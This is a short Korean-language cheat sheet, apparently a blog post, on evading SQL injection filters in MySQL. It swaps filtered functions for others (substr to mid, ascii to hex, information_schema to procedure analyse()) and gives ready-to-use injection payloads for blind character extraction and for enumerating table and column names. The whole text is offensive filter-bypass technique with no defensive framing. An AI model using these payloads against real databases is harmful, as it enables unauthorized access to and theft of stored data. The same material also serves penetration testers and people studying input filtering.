SQL Injection 필터링 - substr,ascii,infromation_schema

SQL injection 필터링 대체 함수 

substr - mid

ascii - hex

infromation_schema - procedure analyse()

예제모음)

1) ascii(substr(table_name,1,1)) >= 123%23

   -> hex(mid(table_name,1,1)) >= 123%23 // 아스키코드대신 hex값으로 대조 하고 substr대신 mid함수로 자른다.

2) 컬럼,테이블,데이터베이스등의 이름을 알아와야하는데 union,select,infromation_schema 등이 필터링 됬을경우 procedure analyse()을 사용한다.

  infromation - >union select null,null from information_schema.tables limit 0,1%23

  procedure analyse() -> limit 0,1 procedure analyse() //이함수를 사용하면 union,select등 많은 함수를 생략할수 있다.